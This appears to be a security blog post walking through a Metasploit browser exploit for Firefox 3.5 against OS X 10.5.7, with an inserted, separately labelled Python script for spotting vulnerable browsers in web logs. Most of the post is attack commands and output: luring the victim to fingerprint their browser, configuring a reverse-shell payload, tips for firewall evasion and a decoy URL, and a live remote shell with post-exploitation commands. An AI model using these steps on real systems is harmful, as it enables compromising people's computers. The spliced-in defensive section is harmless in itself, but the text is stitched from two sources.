The Firefox 3.5 escape() return value memory corruption exploit covered in an earlier blog post, which at the time worked against Windows XP, has now been expanded to cover OS X 10.5.7, and it has been improved so that no "script problem" message requiring interaction from the user is shown. For use against an OS X target the attack might look something like this:
carlos@loki:~/svn/msf3-dev$ sudo nc -vv -l -p 80
[sudo] password for carlos:
listening on [any] 80 ...
connect to [192.168.1.158] from carlos-perezs-computer.local [192.168.1.120] 58924
GET / HTTP/1.1
Host: 192.168.1.158
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1) Gecko/20090624 Firefox/3.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
^C sent 0, rcvd 370
Here the target was first tricked into connecting to a Netcat listener so we could look at the User-Agent string and identify the target OS and browser; this could just as easily have been done by creating a fake web page, having the victim connect, and looking at the web server logs or a sniffer capture. We continue by launching Metasploit, selecting the exploit and payload, and setting the proper target:
carlos@loki:~/svn/msf3-dev$ sudo ./msfconsole
[msfconsole ASCII art banner omitted]

       =[ msf v3.3-dev
+ -- --=[ 384 exploits - 261 payloads
+ -- --=[ 20 encoders - 7 nops
       =[ 166 aux

msf > use exploit/multi/browser/firefox_escape_retval
msf exploit(firefox_escape_retval) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Firefox 3.5.0 on Windows XP SP0-SP3
   1   Firefox 3.5.0 on Mac OS X 10.5.7 (Intel)

msf exploit(firefox_escape_retval) > set TARGET 1
TARGET => 1
msf exploit(firefox_escape_retval) > set PAYLOAD osx/x86/vforkshell_reverse_tcp
PAYLOAD => osx/x86/vforkshell_reverse_tcp
msf exploit(firefox_escape_retval) > set LHOST 192.168.1.158
LHOST => 192.168.1.158
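The same User-Agent triage can be turned around for defence. As an added example (not code from the original post or from Metasploit), this Python script scans web-server log lines and reports the clients whose Firefox version and OS match one of the two entries in the module's target list above, so an administrator can find the browsers that still need patching. The combined log format and every sample line except the first (which reuses the User-Agent captured by Netcat above) are constructed assumptions.

```python
import re
from typing import Dict, List, Optional, Tuple

# Constructed NCSA combined-format log lines. The first User-Agent is the one
# captured by the netcat listener above; the other three are made up to cover
# the non-matching paths (an XP client, a later 3.5.x build, an older 3.0.x).
SAMPLE_LOG = """\
192.168.1.120 - - [07/Jul/2009:10:01:02 -0400] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1) Gecko/20090624 Firefox/3.5"
10.0.0.5 - - [07/Jul/2009:10:01:03 -0400] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1) Gecko/20090624 Firefox/3.5"
10.0.0.6 - - [07/Jul/2009:10:01:04 -0400] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1"
10.0.0.7 - - [07/Jul/2009:10:01:05 -0400] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.11) Gecko/2009060214 Firefox/3.0.11"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) .*? "(?P<ua>[^"]*)"\s*$')  # UA is the last quoted field
FIREFOX_RE = re.compile(r"Firefox/(\d+(?:\.\d+)*)")
# OS tokens as they appear in Gecko UA strings, mapped to the platform names
# used in the module's target list.
OS_TOKENS = {"Windows NT 5.1": "Windows XP", "Mac OS X 10.5": "Mac OS X 10.5"}
TARGET_VERSION = (3, 5, 0)  # Firefox 3.5.0 is the only version in the target list

def parse_version(text: str) -> Tuple[int, ...]:
    """'3.5' -> (3, 5, 0); '3.5.1' -> (3, 5, 1). Pads to three components."""
    parts = tuple(int(p) for p in text.split("."))
    return (parts + (0, 0, 0))[:3]

def assess_user_agent(ua: str) -> Optional[Dict[str, str]]:
    """Return {'version', 'os'} for a Firefox UA, or None if it is not Firefox."""
    m = FIREFOX_RE.search(ua)
    if not m:
        return None
    os_name = next((name for tok, name in OS_TOKENS.items() if tok in ua), "other")
    return {"version": m.group(1), "os": os_name}

def matches_target(info: Dict[str, str]) -> bool:
    """True only for Firefox 3.5.0 on one of the two listed target platforms."""
    return parse_version(info["version"]) == TARGET_VERSION and info["os"] != "other"

def flag_clients(log_text: str) -> List[Tuple[str, str, str]]:
    """Scan log lines; return (ip, firefox version, os) for clients that match."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        info = assess_user_agent(m.group("ua"))
        if info and matches_target(info):
            hits.append((m.group("ip"), info["version"], info["os"]))
    return hits
```

Running flag_clients(SAMPLE_LOG) reports only the two Firefox 3.5 clients on OS X 10.5 and Windows XP; the 3.5.1 and 3.0.11 clients are left alone.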
As can be seen, the payload selected was the vforkshell. One of the main advantages of this shell is that, since it uses the vfork() Unix call to spawn itself, it does not run inside the exploited process, so when the target kills the hung browser we do not lose our shell access. Since we launched the exploit as root we can change the port the exploit listens on to port 80, making it easier to reach a target behind a proxy or firewall, change the URI path to a less suspicious one, and launch the exploit:
msf exploit(firefox_escape_retval) > set SRVPORT 80
SRVPORT => 80
msf exploit(firefox_escape_retval) > set URIPATH secretdocumets.html
URIPATH => secretdocumets.html
msf exploit(firefox_escape_retval) > exploit
[*] Exploit running as background job.
msf exploit(firefox_escape_retval) >
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:80/secretdocumets.html
[*] Local IP: http://192.168.1.158:80/secretdocumets.html
[*] Server started.
Once the target connects to our server, the exploit JavaScript code is delivered along with the payload:
[*] Sending Firefox 3.5 escape() Return Value Memory Corruption to 192.168.1.120:52760...
[*] Command shell session 1 opened (192.168.1.158:4444 -> 192.168.1.120:52770)
Once the shell is created we can interact with it. One important thing to remember is that the shell's environment variables are those of the exploited process, so we will have to use full paths when calling certain commands:
msf exploit(firefox_escape_retval) > sessions -l

Active sessions
===============

  Id  Description    Tunnel
  --  -----------    ------
  1   Command shell  192.168.1.158:4444 -> 192.168.1.120:52770

msf exploit(firefox_escape_retval) > sessions -i 1
[*] Starting interaction with 1...

id
uid=501(labuser) gid=501(labuser) groups=501(labuser),98(_lpadmin),81(_appserveradm),79(_appserverusr),80(admin)
uname -a
Darwin testmac.local 9.7.0 Darwin Kernel Version 9.7.0: Tue Mar 31 22:52:17 PDT 2009; root:xnu-1228.12.14~1/RELEASE_I386 i386
env
PWD=/sbin
SHLVL=1
_=/usr/bin/env
OLDPWD=/bin
/sbin/ifconfig
lo0: flags=8049<UP,LOOPBACK,RUNNING,MULTICAST> mtu 16384
    inet6 fe80::1%lo0 prefixlen 64 scopeid 0x1
    inet 127.0.0.1 netmask 0xff000000
    inet6 ::1 prefixlen 128
gif0: flags=8010<POINTOPOINT,MULTICAST> mtu 1280
stf0: flags=0<> mtu 1280
en0: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500
    ether 00:16:cb:9f:9e:11
    media: autoselect status: inactive
    supported media: autoselect 10baseT/UTP <half-duplex> 10baseT/UTP <full-duplex> 10baseT/UTP <full-duplex,hw-loopback> 10baseT/UTP <full-duplex,flow-control> 100baseTX <half-duplex> 100baseTX <full-duplex> 100baseTX <full-duplex,hw-loopback> 100baseTX <full-duplex,flow-control> 1000baseT <full-duplex> 1000baseT <full-duplex,hw-loopback> 1000baseT <full-duplex,flow-control> none
fw0: flags=8802<BROADCAST,SIMPLEX,MULTICAST> mtu 2030
    lladdr 00:17:f2:ff:fe:71:a7:b4
    media: autoselect <full-duplex> status: inactive
    supported media: autoselect <full-duplex>
en1: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500
    inet6 fe80::217:f2ff:fe99:d7cf%en1 prefixlen 64 scopeid 0x6
    inet 192.168.1.120 netmask 0xffffff00 broadcast 192.168.1.255
    ether 00:17:f2:99:d7:cf
    media: autoselect status: active
    supported media: autoselect
en4: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500
    ether 00:16:cb:33:3e:50
    media: autoselect status: inactive
    supported media: none autoselect 10baseT/UTP <half-duplex>
vmnet8: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500
    inet 192.168.187.1 netmask 0xffffff00 broadcast 192.168.187.255
    ether 00:50:56:c0:00:08
vmnet1: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500
    inet 192.168.38.1 netmask 0xffffff00 broadcast 192.168.38.255
    ether 00:50:56:c0:00:01
exit
[*] Command shell session 1 closed.
This exploit will be added to the Browser Autopwn module in Metasploit after Defcon 17.